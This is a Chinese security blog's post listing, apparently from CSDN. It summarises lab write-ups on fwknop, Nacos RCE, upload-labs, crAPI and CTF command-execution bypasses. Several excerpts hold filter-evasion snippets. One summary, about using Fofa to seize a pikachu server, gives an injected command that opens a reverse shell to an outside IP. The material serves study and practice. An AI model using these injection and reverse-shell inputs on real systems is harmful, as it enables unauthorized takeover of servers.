- 博客(13)
- 收藏
- 关注
RSS订阅原创 零信任技术之fwknop单包认证敲门
需要有两台Linux虚拟机,我这里其中一台为Ubuntu,一台为kali,我们以kali作为服务器,以Ubuntu作为客户机,要让Ubuntu想办法敲开Linux的22号端口。通过在服务器和客户机上分别部署feknop敲门服务端和敲门客户端并进行配置,可以只让授权的客户端所在的机器敲开服务器的受保护的22号端口。其中xxx替换为我们的Ubuntu的ip,yyy替换为服务器的ip,我们首先用。这会在我们的家目录下生成一个.fwknoprc文件,我们进入下面的目录,并在。查看一下我们的服务端和客户端的ip。
2024-07-21 16:42:11
745
原创 川大网安暑期实训—了解和认识云安全
云厂商一般会将一台物理服务器分割为多个虚拟机,跟我们自己在VMware建立虚拟机是一个道理,每个虚拟机都有自己独立的操作系统、资源(CPU、内存、存储空间)和公网IP地址,这样的虚拟机就是VPS,虚拟专用服务器,但是VPS有一个缺点,就是不支持用户自主升降级,资源是预先分配好的并且不易于动态调整的,即如果你是1核1G的服务器,想要给他升级到2核2G的,在VPS中是实现不了的,但是如果加入自主升级降级的功能,就成了ECS(Elastic Compute Service
2024-07-20 16:17:31
934
原创 nacos 1day保姆级复现
NACOS是一个开源的服务发现、配置管理和服务治理平,属于阿里巴巴的一款开源产品2.3.2版本的nacos存在远程代码执行漏洞,攻击者可以在远程服务器上执行任意代码,进而让攻击者完全控制受影响的系统,导致严重的安全问题。
2024-07-20 11:53:58
843
原创 川大实训-全套安全加固实验报告(包括扩展实验mysql访问配置实验)
安全加固和优化是实现信息系统安全的关键环节。通过安全加固,将在信息系统的网络层、主机层、软件层等层次建立符合安全需求的安全状态,并以此作为保证用户信息系统安全的起点安全加固是配置软件系统的过程中,针对服务器操作系统、数据库及应用中间件等软件系统,通过打补丁、强化账号安全、加固服务、修改安全配置、优化访问控制策略、增加安全机制等方法,堵塞漏洞和“后门”,合理进行安全性加强,提高其健壮性和安全性,增加攻击者入侵的难度,提升系统安全防范水平配置登录登出后,不显示用户名称。打开控制面板管理工具本地安全策略,在。
2024-07-19 20:25:11
784
原创 Docker和传统虚拟机的区别
最近在部署自己的博客时遇见过购买服务器的问题,当时打开阿里云轻量级服务器时,看见这么多的实例,属实是自己也有点懵逼,什么ECS,VPS,ECI一大堆,自己也不知道是什么东西,但是跟着CSDN教程,还是把服务器给选好了;这两天在学习操作系统的时候,老师也讲到docker技术,并且给我们强调了它和虚拟机的区别,当时旁边一个同学一直在说docker和nachos没什么太大的区别,我很疑惑,于是在课后搜索了相关资料,汇总成这一篇学习笔记。
2024-07-19 16:05:01
882
原创 文件上传漏洞靶场通关教程(全)
upload-labs靶场通关教程,从第一关到第二十一关,包含各种绕过以及图片马、条件竞争、代码审计等,适合文件上传漏洞练习
2024-07-18 23:02:34
1292
原创 crAPI靶场搭建及通关教程
靶场加深了我对API安全的认识,有些漏洞在现实生产环境中仍然很普遍,同时,通过打靶场,加深了我对一个网站如何进行测试的理解,虽然有些漏洞比较偏,也比较难想,但是经过多多实践,还是可以熟能生巧的这个靶场带给我的最大的惊喜还是jwt,它告诉了我关于jwt还可以使用bp进行破解,当然这个手法还需要后续的学习与理解,以前我都是直接通过脚本进行破解,没有直接用bp来的舒服,又多了一种新的姿势🤔🤔🤔。
2024-07-18 13:04:51
1000
原创 浅谈HTTP基础知识——HTTP状态码及HTTP缓存技术
众所周知,计算机网络作为计算机中的一大巨头,每年面试的时候都会被问的很多,同时,作为计算机网络中最为基础的协议——HTTP协议,在面试中被问的概率是很高的。无论是面试开发岗还是安全岗,清楚的了解HTTP协议的工作流程是必不可少的,下面就将围绕几个比较常见的关于HTTP协议的面试题做出收集和知识点整理。
2024-07-08 20:01:06
822
1
原创 Dragon Knight CTF 2024WP
呃呃呃,第一次正式打的比赛吧,被虐爆了,web方向只有三道题,但是由于各种原因,只写出来了一道,后面就没太多时间去写了,这是我对本次比赛的复现,希望能给各位师傅一点帮助。
2024-06-06 16:38:03
692
原创 CTF 命令执行绕过总结
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示。或:rce-xor-or.php & rce-xor-or.py。# ls -t >shell 将输出输入到shell文件中。异或:rce-xor.php & rce-xor.py。%09(url传递)(cat%09flag.php)sh /flag 2>%261 //报错出文件内容。2、1使用空变量$*和$@,$x,${x}绕过。7、异或无符号(过滤0-9a-zA-Z)more:一页一页的显示档案内容。
2024-06-01 16:25:22
412
原创 实战案例-Fofa拿下pikachu服务器保姆级别教程(文件上传下载&webshell)
输入127.0.0.1 & 1.exe -e cmd 47.109.189.205 5566(47.109.189.205为自己服务器的ip),拿到服务器的控制权
2024-04-14 10:07:26
1200
3
原创 fiddler抓取微信小程序包
最近看了看一些公众号上的文章,发现一个用fiddler抓取羊了个羊的教程。对我这种小白来说,这种实验既有吸引力复现难度也不高,所以打算自己动手实操一下😍😍😍以下内容是对本次实验的复现最开始的时候,发现作者使用了fiddler这个工具,当时没听说过这个工具,很好奇和burp、wireshark有什么区别,后来在实际应用中呢,发现它好像综合了burp和wireshark,fiddler可以将网络传输发送与接收的数据包进行截获、重发、编辑和转存等操作;
2024-04-12 16:50:26
5209
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人